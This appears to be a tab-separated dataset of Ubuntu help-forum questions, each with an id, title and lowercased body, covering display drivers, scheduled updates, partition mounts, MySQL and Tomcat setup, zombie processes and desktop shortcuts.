30817	how to get compaq presario cq62 brightness keys to work ?	i 've tried the brightness keys for my laptop in both maverick and natty and they do n't work in either distribution . the key seems to be taken as a shortcut somewhere because it wo n't allow me to reassign it else where . how can i actually get these brightness keys to work ? pending that , where/to whom should i report this hardware issue to ?
30825	how to schedule time-of-day upgrades	i 'm responsible for about 30 ubuntu computers at a private k-8 school . we have only a 3mbps internet connection serving the entire campus , and i would like to ensure that updates are done in the middle of the night - so that daytime tasks are not slowed down . i 'm using ubuntu 10.04 , and have set all computers to download and install security updates via the update manager . i have also installed cron-apt , and modified the config file to stagger the start times of the upgrades from about 10pm to 4am local time . however - this morning i arrived at the school at 7:30am and all the computers were busy downloading a large security based update . needless to say , all internet activity was slowed to a crawl ( for the next 2 hours ) , and the computer users were very very upset . this was the event i 'm trying so hard to prevent . it seems that my scheme to ensure middle of the night downloads failed , and i 'm not sure why . i 've also tried some schemes using unattended-upgrades & crontab , but there always seemed to be something scheduling upgrades to occur in addition to the ones i try to force at middle of the night . is there a sure fire way to absolutely positively guarantee that updates will occur only at one specific time ? it would be nice if the update manager just had a drop down menu to specify a designated time . thanks in advance for any help you can give me .
30826	ubuntu confuses my partitions	i have 3 relevant partitions split between 2 disks , sda2 : windows 1 partition sda3 : ubuntu partition sdb1 : data partition i was using pysdm to add a label to my partitions and somehow i seem to have screwed up my installation . now , every time i access the data partition mounted in /media/data i see the files in my windows partition , and viceversa . i 've tried unmounting and remounting correctly to no avail , it seems that wherever i mount sda2 , if i access that folder i get the files in sdb1 , and viceversa . anyone know what may have happened and how to solve this ? update : this is the result of blkid : /dev/sda1 : label= '' system reserved '' uuid= '' c62603f02603e073 '' type= '' ntfs '' /dev/sda2 : label= '' windows '' uuid= '' 00a6d498a6d49010 '' type= '' ntfs '' /dev/sda5 : uuid= '' 033cac3b-6f77-4f09-a629-495dc866866a '' type= '' ext4 '' /dev/sdb1 : label= '' data '' uuid= '' bcd83ae3d83a9b98 '' type= '' ntfs '' these are the contents of my ftsab file : uuid=033cac3b-6f77-4f09-a629-495dc866866a / ext4 errors=remount-ro , user_xattr 0 1 /dev/sda1 /media/boot_old ntfs defaults 0 0 /dev/sda2 /media/windows ntfs defaults 0 0 /dev/sdb1 /media/data ntfs nls=iso8859-1 , ro , users , umask=000 0 0
30828	over-scan issues when using hdtv through vga	right now all we can do is set the tv to 1280x768 instead of its native resolution of 1360x768 . setting it to its native resolution gives you a screen with a large portion of the left side of the screen cut off . we 've tried everything with the tv so now we 're turning to the innards of ubuntu in hopes of fixing this . the computer is using an nvidia geforce gt240 . this is its current xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ palmer ) fri apr 9 10:35:18 utc 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin # horizsync 28.0 - 55.0 # vertrefresh 43.0 - 72.0 identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 6600 '' endsection section `` screen '' # removed option `` metamodes '' `` 1360x768 +0+0 ; 800x600 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1360x768 +0+0 '' subsection `` display '' depth 24 endsubsection endsection
30830	how do i hide a specific volume from the desktop , but keep all others ?	i find the icons that show up when i plug a flash drive useful , as much as sd cards and devices . however , the icon to my windows partition is useless . how can i hide it ?
30833	are there any good programs to learn dvorak	how do i learn dvorak typing in ubuntu ? i have ubuntu 10.04 and i 'm planning to learn one of the swedish dvorak versions . it 's included in ubuntu 10.04 . my question is : is there a good program to learn dvorak ( sv ) ? i 've linked the version that i want to learn and i really need a picture of the keyboard setup . because i ca n't see the layout at the moment . ktouch does n't support my version of dvorak , and klarvo does n't show a picture of the keyboard .
30841	how can i switch windows only in one workspace ?	i enable compiz and switch windows by tab , but i do n't want to iterate all windows in all workspaces . how can i switch windows in one workspace ?
30845	if ubuntu freezes when running off a usb drive , will it freeze after full installation ?	i 'm planning to install ubuntu on an aging compaq presario v5000 . i 've established that the unity desktop is not suited to this laptop , and am now using the standard ( gnome ? ) desktop . i 'm grappling with ndiswrapper and my wireless chipset . but i 'm still running it off a usb drive before i take the plunge and install properly to my internal hd . part of my reticence in completing the installation is i 'm experience freezes after about 10-20 minutes usage . is this likely to be in any way related to running it off the usb drive ? edit : marked answer as accepted , installing onto hard disk has eliminated freezes .
30848	update/installs fails with unrecoverable dpkg fatal error because libc6-i386 is missing	i keep receiving this error every-time i try to do some updates . i tried sudo dpkg -- configure , sudo apt-get update and sudo apt-get install -f but they failed on me . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % dpkg : unrecoverable fatal error , aborting : failed to read on buffer copy for files list for package `libc6-i386 ' : is a directory i tried to find the file but it appears to be missing . ls : can not access /var/lib/dpkg/info/libc6-i386 : no such file or directory and bash : /var/lib/dpkg/info/libc6-i386 : no such file or directory
30849	how can i test the system footprint of applications ?	i am about to start my masters project and i will need to gather some data , for the requirements stage , about the performance footprint applications have on my system . the main things i am look for are load times , memory and cpu usage and shutdown time , although i would like to get as much information as possible . i know i can use the system monitor to get some of this stuff , but i need precise data as i am going to be doing some before and after tests during my project . is there anything out there ( preferably open source ) that will suffice ?
30851	installing mysql causes error 2002 error	i tried installing mysql server a couple of times and i 'm having problems . first of all , when i install it gives me a message that it 's setting up and it just hangs . i ca n't ctl + c out of it , so i reboot the server and try to log into the db with sudo mysql -u root -p i enter my password and then get error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i restart the server : $ sudo /etc/init.d/mysql start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start mysql i try this : $ aptitude search mysql | grep ^i i a libdbd-mysql-perl - perl5 database interface to the mysql data i libmysql-java - java database ( jdbc ) driver for mysql i a libmysqlclient16 - mysql database client library i mysql-client-5.1 - mysql database client binaries i a mysql-client-core-5.1 - mysql database core client binaries i mysql-common - mysql database common files , e.g . /etc/mys i mysql-embedded - mysql - embedded library i mysql-server-core-5.1 - mysql database server binaries when i navigate to the folder to see if the *.sock file exists : '/var/run/mysqld/mysqld.sock' it does not . i also try this : $ service mysql status status : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory any ideas ? on my other machines installing mysql has been a snap , not sure what the problem is here .
30856	should my dash be full screen ?	i am using ubuntu natty with the latest updates and the unity dash is in full screen . my laptop has a 17 '' screen with a resolution of 1366 x 768 . if this is not the normal behavior i will report it as a bug on launchpad but i 'm not sure of the specifics if anyone could tell me what the specifics are regarding the dash size .
30857	thinkpad ( t510 ) display port to hdmi tv	i 'd like to connect my laptop via a displayport2hdmi adapter to a tv . i tried simply connecting everything , but unfortunately that did n't work . i also did n't see any option in nvidia-settings to configure any output via the displayport . has anybody such a setup working , or the displayport at all ? i 'm running ubuntu 10.10 . my machine is a lenovo thinkpad t510 with a nvs 3100m graphics card .
30858	how to reset lost user password on a guest on vmware server ?	i have a ubuntu 10.10 vmware image that i set up a while back and have forgotten the login details . normally i 'd boot into single user mode to fix this , but i 'm having trouble doing this on the vmware image . no grub screen comes up on boot , and attempts to hold down or press shift , space or escape during boot do nothing , the machine just boots up as before to the login prompt . any ideas ?
30859	can anyone get an myname @ ubuntu.com email address ?	if it is possible how can i get one ?
30866	how can create the smallest possible mirror of the archive ?	i need to create an http url at my laptop to have a ubuntu installation begin within my laptop on a xen environment . this is how the final thing will look like . the host and client are both going to be my laptop , i googled and came across apt-mirror and some other packages . i do not want to archive entire 15 gb ubuntu repositories on my machine . it is not possible to use a cd , iso , loop mounted disk ( reason mentioned below ) . i have tried using netboot image on local machine which failed because if you are attempting to create a virtual machine on a hardware which does not support vt virt-manager installer necessarily needs a url of this sort http : //archive.ubuntu.com/ubuntu/dists/hardy/main/installer-i386/current/images/netboot/ any other option to create guest os is simply grayed out . the unfortunate part is my ethernet connections do not work when i boot with xen-4.0 and a pv-ops dom0 kernel from jeremy 's tree . which is where i have to do this work . so i have to create a url structure which is similar to ubuntu mirrors . so how can i do this in bare minimum so that at least the console boots and once the console comes i can do some work .
30869	what is the easiest way to record my desktop in ubuntu ?	i want to make a video tutorial on some ubuntu functionality but do n't know how to record it .
30877	error during edubuntu installation : process:226	we recently introduced edbuntu to a team of school teachers . one of them tried installing edubuntu in their school computers and have reported us this problem . i have no answer for the problem . so can anyone help ? one of the teacher 's wrote : i was able to install edubuntu in some of the pc . but not able to install in pcs with celeron processor 2.40 ghz , 1gb ram & hdd 40gb . im getting error message : process:226 - glib warning : getpwuid_r ( ) : failed due to unknown user id ( 0 )
30882	how do i make the dash open up fullscreen in 2d ?	how to make the dash in unity 2d open up full-screen ?
30887	disabling autoscaling when the text inside gets bigger than the object in dia ( diagrams editor ) ?	when the text gets longer than , for instance , a circle . it just scales the circle . is there any way to make the text go to the next line ?
30888	why do control keys ( ctrl , shift , alt ) not work sometimes ?	sometimes ( about once a week ) the control keys ( ctrl , shift , alt ) so not work anymore . they do work when i boot up , but after a while they stop working . logging out and in again repairs it . what can cause something like that ? it is a laptop keyboard ( hp elitebook 8730w ) with german layout . incidentally it just happened right after vmware-player crashed same as the last time . coincidence ?
30891	is there any way to kill a zombie process without reboot ?	is there any way to kill a zombie process without reboot ? here is how it happened : i want to download a 12gb file using torrent . after adding the .torrent file , transmission turned into a zombie process ( i tried ktorrent too . same behavior ) . finally i could download the file using µtorrent but after closing the program , it turns into a zombie as well . i tried using kill , skill and pkill with different options and -9 signal but no success . after reading some solutions on web , i found out killing the parent can kill the zombie . but killing wine did n't help either . is there another way ? edit : ps -o pid , ppid , stat , comm pid ppid stat command 7121 2692 ss bash 7317 7121 r+ ps pstree output : init─┬─googletalkplugi───4* [ { googletalkplug } ] ├─networkmanager─┬─dhclient │ └─ { networkmanager } ├─acpid ├─amarok───19* [ { amarok } ] ├─apache2───5* [ apache2 ] ├─atd ├─avahi-daemon───avahi-daemon ├─bonobo-activati─── { bonobo-activat } ├─clock-applet ├─console-kit-dae───63* [ { console-kit-da } ] ├─cron ├─cupsd ├─2* [ dbus-daemon ] ├─2* [ dbus-launch ] ├─desktopcouch-se───desktopcouch-se ├─firefox───run-mozilla.sh───firefox-bin─┬─plugin-containe───8* [ { plugin-contain } ] │ └─14* [ { firefox-bin } ] ├─gconfd-2 ├─gdm-binary─┬─gdm-simple-slav─┬─xorg │ │ ├─gdm-session-wor─┬─gnome-session─┬─bluetooth-apple │ │ │ │ ├─compiz───sh───gtk-window-deco │ │ │ │ ├─fusion-icon │ │ │ │ ├─gdu-notificatio │ │ │ │ ├─gnome-panel─── { gnome-panel } │ │ │ │ ├─gnome-power-man │ │ │ │ ├─gpg-agent │ │ │ │ ├─gwibber-service │ │ │ │ ├─nautilus │ │ │ │ ├─nm-applet │ │ │ │ ├─polkit-gnome-au │ │ │ │ ├─2* [ python ] │ │ │ │ ├─qstardict─── { qstardict } │ │ │ │ ├─ssh-agent │ │ │ │ ├─tracker-applet │ │ │ │ ├─trackerd │ │ │ │ ├─wakoopa─┬─wakoopa │ │ │ │ │ └─3* [ { wakoopa } ] │ │ │ │ └─ { gnome-session } │ │ │ └─ { gdm-session-wo } │ │ └─ { gdm-simple-sla } │ └─ { gdm-binary } ├─6* [ getty ] ├─gnome-keyring-d───2* [ { gnome-keyring- } ] ├─gnome-screensav ├─gnome-settings- ├─gnome-system-mo ├─gnome-terminal─┬─bash───ssh │ ├─bash───pstree │ ├─gnome-pty-helpe │ └─ { gnome-terminal } ├─gvfs-afc-volume─── { gvfs-afc-volum } ├─gvfs-fuse-daemo───3* [ { gvfs-fuse-daem } ] ├─gvfs-gdu-volume ├─gvfsd ├─gvfsd-burn ├─gvfsd-computer ├─gvfsd-metadata ├─gvfsd-trash ├─hald─┬─hald-runner─┬─hald-addon-acpi │ │ ├─hald-addon-cpuf │ │ ├─hald-addon-inpu │ │ └─hald-addon-stor │ └─ { hald } ├─indicator-apple ├─indicator-me-se ├─indicator-sessi ├─irqbalance ├─kded4 ├─kdeinit4─┬─kio_http_cache_ │ └─klauncher ├─kglobalaccel ├─modem-manager ├─multiload-apple ├─mysqld───10* [ { mysqld } ] ├─named───10* [ { named } ] ├─nmbd ├─notification-ar ├─notify-osd ├─polkitd ├─pulseaudio─┬─gconf-helper │ └─2* [ { pulseaudio } ] ├─rsyslogd───2* [ { rsyslogd } ] ├─rtkit-daemon───2* [ { rtkit-daemon } ] ├─smbd───smbd ├─snmpd ├─sshd ├─timidity ├─trashapplet ├─udevd───2* [ udevd ] ├─udisks-daemon─┬─udisks-daemon │ └─ { udisks-daemon } ├─upowerd ├─upstart-udev-br ├─utorrent.exe─── { utorrent.exe } ├─vnstatd ├─winbindd───2* [ winbindd ] ├─wnck-applet ├─wpa_supplicant └─xinetd system monitor and top show the zombie process is using resources : edit 2 : i think i found something . i tried to logout and saw this message : since other torrent clients have th same issue maybe it 's something about file size.i 'm using ubuntu 10.04 on ext4 partitions.killing nautilus and sending sigchld signal to it did n't work .
30895	unity install removed window borders , and display drivers	i installed unity , used for a while . then i installed gnome-shell , used it for a while . now decided to switch back to standard . gnome is not working the way it use to be . i am using t61 with nvidia-latest drivers . following issues ... window borders are not showing . installed compiz settings , and re-check window decorations option . i had to re-install nvidia driver , as when i tried to apply normal visual effects , it said no display driver found . gnome panel is not coming , and mouse pointer is a `` cross '' than a `` arrow '' . i then opened a terminal and enter gnome-panel . panel came and window borders came back . nothing is showing on desktop , and the right click is also not populating the menu . when i loging , an error message saying , docky did not start and it requires compiz to work . after starting gnome-panel from terminal , i went to system > preferences > appearance . and selected normal visual effects . it activated , i selected keep the settings . now when i restart or re-login , everything is gone . i have to run gnome-panel manually , and then re-enable visual setting . ofcourse i can add gnome-panel in startup applications , but i want to know what has installing unity/gnome-shell has done , that these setting are messed up . i manually removed mutter , as appearance application was showing mutter installed , cant enable effects . what shall i do to get back a standard gnome-desktop back .
30896	gnome-panels take a long time to load on startup	i am using the 64 bit of ubuntu maverick desktop . the problem is that as soon as i login , the wallpaper and the desktop icons appear almost instantly , however the panel-takes an eternity to load , sometimes as long as 30 secs . i have a fairly modern system , so i am sure this is software related . any fixes ? thanks in advance .
30899	gnome-panel freezes occasionally	hey folks , i have a problem with my gnome-panel . occasionally my gnome-panel freezes , meaning that all icons ( network status , sound , etc . ) freeze along with the time displayed . when i kill the process , the panel restarts automatically and works just fine . is there a way to prevent the panel from freezing ? thx in advance for any help , suggestion link etc ! cherio woltan ps a new phenomenon occurred . after booting ubuntu the panel did n't load at all , however i was able to access the menu and other icons by hovering over their usual positions . after a reboot the panel worked just fine ...
30902	how to adjust `` contrast '' of a gtk2 theme ?	i 'd like to reduce the contrast of the gtk widgets , that is , make the borders less articulate . e.g . in the screenshot below , the separator above and below the toolbar is very strong . i 'd like smoother borders . how is this possible ?
30906	vaio vpcs136fg boots to just a black screen	hi all i 've recently bought a vaio s series laptop , in case s136 . the problem is that when i try to boot from live disc to install or test , just a black screen appears . the problem , as addressed in many threads , is that xorg ca n't find the edid of monitor , thus fails . i 've tried several solutions described in several forums , but still no success ; except that before trying these solutions , the monitor was absolutely off , but now it has the backlight but it is still black . this is my situation : my vaio is vpc s136 fg with a geforce 310m . my xorg log file doesnt say any error about the edid file . you can find it in the following . i can boot up ubuntu in failsafe mode with 1280* ... resolution , but it doesnt use nvidia driver . i 've installed nvidia driver , version 260.19.06-0ubuntu1 . i 've recently installed xorg-edgers from the ppa , but it just adds a thin line of light , up in the monitor . this is my xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 260.19.06 ( buildmeister @ builder101 ) mon sep 13 07:06:38 pdt 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` connectedmonitor '' `` dfp-0 '' option `` customedid '' `` dfp-0 : /etc/x11/edid.raw '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection this is the xorg log file . you can see that there is no error due to edid : [ 11.271 ] x.org x server 1.9.0 release date : 2010-08-20 [ 11.271 ] x protocol version 11 , revision 0 [ 11.271 ] build operating system : linux 2.6.24-27-server i686 ubuntu [ 11.271 ] current operating system : linux vaio 2.6.35-22-generic # 33-ubuntu smp sun sep 19 20:34:50 utc 2010 i686 [ 11.271 ] kernel command line : boot_image=/boot/vmlinuz-2.6.35-22-generic root=uuid=af281b98-981a-4eb6-9ebf-36357393bed5 ro quite splash [ 11.271 ] build date : 16 september 2010 05:39:22pm [ 11.271 ] xorg-server 2:1.9.0-0ubuntu7 ( for technical support please see http : //www.ubuntu.com/support ) [ 11.284 ] current version of pixman : 0.18.4 [ 11.284 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 11.285 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 11.285 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : mon mar 14 00:00:04 2011 [ 11.304 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 11.304 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 11.381 ] ( == ) serverlayout `` layout0 '' [ 11.381 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 11.381 ] ( ** ) | | -- > monitor `` monitor0 '' [ 11.381 ] ( ** ) | | -- > device `` device0 '' [ 11.381 ] ( ** ) | -- > input device `` keyboard0 '' [ 11.381 ] ( ** ) | -- > input device `` mouse0 '' [ 11.381 ] ( == ) automatically adding devices [ 11.381 ] ( == ) automatically enabling devices [ 11.449 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 11.450 ] entry deleted from font path . [ 11.481 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 11.481 ] ( == ) modulepath set to `` /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 11.481 ] ( ww ) allowemptyinput is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 11.482 ] ( ww ) disabling keyboard0 [ 11.482 ] ( ww ) disabling mouse0 [ 11.482 ] ( ii ) loader magic : 0x81f8e00 [ 11.482 ] ( ii ) module abi versions : [ 11.482 ] x.org ansi c emulation : 0.4 [ 11.482 ] x.org video driver : 8.0 [ 11.482 ] x.org xinput driver : 11.0 [ 11.482 ] x.org server extension : 4.0 [ 11.482 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0a75:104d:9069 rev 162 , mem @ 0xd2000000/16777216 , 0xc0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00007000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 11.483 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 11.483 ] ( ii ) loadmodule : `` extmod '' [ 11.533 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 11.546 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 11.546 ] compiled for 1.9.0 , module version = 1.0.0 [ 11.546 ] module class : x.org server extension [ 11.546 ] abi class : x.org server extension , version 4.0 [ 11.546 ] ( ii ) loading extension mit-screen-saver [ 11.546 ] ( ii ) loading extension xfree86-vidmodeextension [ 11.546 ] ( ii ) loading extension xfree86-dga [ 11.546 ] ( ii ) loading extension dpms [ 11.546 ] ( ii ) loading extension xvideo [ 11.546 ] ( ii ) loading extension xvideo-motioncompensation [ 11.547 ] ( ii ) loading extension x-resource [ 11.547 ] ( ii ) loadmodule : `` dbe '' [ 11.547 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 11.547 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 11.547 ] compiled for 1.9.0 , module version = 1.0.0 [ 11.547 ] module class : x.org server extension [ 11.547 ] abi class : x.org server extension , version 4.0 [ 11.547 ] ( ii ) loading extension double-buffer [ 11.547 ] ( ii ) loadmodule : `` glx '' [ 11.547 ] ( ii ) loading /usr/lib/xorg/extra-modules/libglx.so [ 12.360 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 12.360 ] compiled for 4.0.2 , module version = 1.0.0 [ 12.360 ] module class : x.org server extension [ 12.360 ] ( ii ) nvidia glx module 260.19.06 mon sep 13 07:01:31 pdt 2010 [ 12.360 ] ( ii ) loading extension glx [ 12.360 ] ( ii ) loadmodule : `` record '' [ 12.361 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 12.374 ] ( ii ) module record : vendor= '' x.org foundation '' [ 12.374 ] compiled for 1.9.0 , module version = 1.13.0 [ 12.374 ] module class : x.org server extension [ 12.374 ] abi class : x.org server extension , version 4.0 [ 12.374 ] ( ii ) loading extension record [ 12.374 ] ( ii ) loadmodule : `` dri '' [ 12.375 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 12.378 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 12.378 ] compiled for 1.9.0 , module version = 1.0.0 [ 12.378 ] abi class : x.org server extension , version 4.0 [ 12.378 ] ( ii ) loading extension xfree86-dri [ 12.378 ] ( ii ) loadmodule : `` dri2 '' [ 12.378 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 12.379 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 12.379 ] compiled for 1.9.0 , module version = 1.2.0 [ 12.379 ] abi class : x.org server extension , version 4.0 [ 12.379 ] ( ii ) loading extension dri2 [ 12.379 ] ( ii ) loadmodule : `` nvidia '' [ 12.379 ] ( ii ) loading /usr/lib/xorg/extra-modules/nvidia_drv.so [ 12.420 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 12.420 ] compiled for 4.0.2 , module version = 1.0.0 [ 12.420 ] module class : x.org video driver [ 12.465 ] ( ii ) nvidia dlloader x driver 260.19.06 mon sep 13 06:37:13 pdt 2010 [ 12.471 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 12.471 ] ( ++ ) using vt number 7 [ 12.478 ] ( ii ) loading sub module `` fb '' [ 12.478 ] ( ii ) loadmodule : `` fb '' [ 12.479 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 12.487 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 12.487 ] compiled for 1.9.0 , module version = 1.0.0 [ 12.487 ] abi class : x.org ansi c emulation , version 0.4 [ 12.487 ] ( ii ) loading sub module `` wfb '' [ 12.487 ] ( ii ) loadmodule : `` wfb '' [ 12.487 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 12.500 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 12.500 ] compiled for 1.9.0 , module version = 1.0.0 [ 12.500 ] abi class : x.org ansi c emulation , version 0.4 [ 12.500 ] ( ii ) loading sub module `` ramdac '' [ 12.500 ] ( ii ) loadmodule : `` ramdac '' [ 12.500 ] ( ii ) module `` ramdac '' already built-in [ 12.533 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 12.533 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 12.533 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 12.533 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 12.533 ] ( ** ) nvidia ( 0 ) : option `` connectedmonitor '' `` dfp-0 '' [ 12.533 ] ( ** ) nvidia ( 0 ) : option `` customedid '' `` dfp-0 : /etc/x11/edid.raw '' [ 12.534 ] ( ** ) nvidia ( 0 ) : enabling render acceleration [ 12.534 ] ( ** ) nvidia ( 0 ) : connectedmonitor string : `` dfp-0 '' [ 12.534 ] ( ii ) nvidia ( 0 ) : support for glx with the damage and composite x extensions is [ 12.534 ] ( ii ) nvidia ( 0 ) : enabled . and this is my edid file , shown in hex format : 00 ff ff ff ff ff ff 00 1e 6d 23 3b 00 00 00 00 00 0b 01 03 1c 1c 15 b0 e8 60 59 a4 54 46 9b 24 10 48 4c ff fe 80 31 4f 31 59 45 4f 45 59 61 4f 61 59 81 80 49 4f ea 24 00 60 41 00 28 30 30 60 13 00 0e c8 10 00 00 18 00 00 00 fd 00 32 a0 1e 46 0b 00 0a 00 00 00 00 20 00 00 00 00 fc 00 53 74 75 64 69 6f 57 6f 72 6b 73 20 35 00 00 00 fc 00 38 35 45 0a 20 20 20 20 20 20 20 20 20 00 4c thanx a lot for any ideas or solutions ; - )
30907	password management applications ?	i have some passwords that are long , complicated and hard to remember . i would like to use a password-manager application to save all of my passwords instead of saving them using a text editor . what is the best password manager ?
30913	does any version of ubuntu arm support arm926ej-s rev 5 ( v5l )	the android system info application on my tablet says that my processor is arm926ej-s rev 5 ( v5l ) . which version of ubuntu arm will work on it ? will i have any issues finding packages for the arm architecture ?
30914	how to configure evolution to use davmail 's ldap contacts ?	my doubts are in the authentication section : authentication method ? ! session ? and i also do n't know how to fill in the details tab : search base ? search scope ? search filter ? how should i fill these in ?
30917	how to make jetty webserver listen on port 80 ?	i would like to use jetty as a webserver . i have edited the configuration file at /etc/default/jetty and set : # change to 0 to allow jetty start no_start=0 # listen to connections from this network host # use 0.0.0.0 as host to accept all connections . jetty_host=0.0.0.0 now i can reach the jetty webserver at http : //192.168.1.10:8080 but i would like to have jetty listening on port 80 . i have tried this setting in the same configuration file : # the network port used by jetty jetty_port=80 and then restart jetty with sudo service jetty restart but it does n't work . how can i change so that the jetty webserver is listening on port 80 ?
30918	broken keyboard shortcuts	when i freshly installed maverick on my new notebook , i set up my keyboard shortcuts like this : switch to ws 1 = mod4+1 , move window to ws 1 = mod4+shift+1 , switch to ws 2 = mod4+2 and so on ( mod4 being the `` windows '' key ) . but now the three-key combinations ( i.e . the ones i use for `` move to ... '' ) stopped working . when i go to keyboard preferences , i still see them and i can even change them to a different combination and then again to the desired one - but they wo n't execute the window movement afterwards : / any suggestions how to fix this ?
30919	how can i make tomboy start a certain note on login ?	is it possible to integrate tomboy a bit more during startup ? i 'm using on a kind of index-note where i always start the program . maybe it can show up open every time i log in ? ( see pictures ) i hope there is a plugin or something . this is the current situation after startup : and this is what i want : and in my dreams is something like this :
30922	screen saver does not show when on battery	i use gnome-screensaver on my system , and it operates near my expectations . one question . is there a way to get the screensaver to show up when the system is operating on battery power only ? right now , the system just blanks the screen , but i 'd really like to see an actual screensaver when i blank my screen . any way to do this ?
30923	how can i install ubuntu on a macbook without affecting my existing os x installation ?	is it possible to install ubuntu on macbook ? if so , how can i modify my partitions without affecting my existing mac os x installation ?
30929	tomcat6 manager webapp returns a 404	http : //localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 ( 6.0.28 on jvm 1.6.0_20-b20 on 2.6.35-27-generic amd64 ) . http : //localhost:8080/host-manager/html works . lists one host name , localhost . installed tomcat6-admin with apt-get . ls dpkg -l | grep -i tomcat6-admin ii tomcat6-admin 6.0.28-2ubuntu1.1 servlet and jsp engine -- admin web applications $ cat /usr/share/tomcat6/conf/tomcat-users.xml < tomcat-users > < role rolename= '' admin '' / > < role rolename= '' manager '' / > < user username= '' tomcatuser '' password= '' password1 '' roles= '' admin , manager '' / > < /tomcat-users > cat /usr/share/tomcat6/conf/catalina/localhost/manager.xml < context path= '' /manager '' docbase= '' /usr/share/tomcat6-admin/manager '' antiresourcelocking= '' false '' privileged= '' true '' / > < role name= '' manager '' / > < user name= '' manager '' password= '' password1 '' roles= '' manager '' / > < user name= '' tomcatuser '' password= '' password1 '' roles= '' manager '' / > those two files are the only documentation i 've seen on how to setup the manager webapp , and they seem to be compliant with the requirements .
30931	how do i make a program auto-start every time i log in ?	i frequently need to start several programs that i use every time i start my computer . how can i make it so that whenever i login the program is automatically launched ?
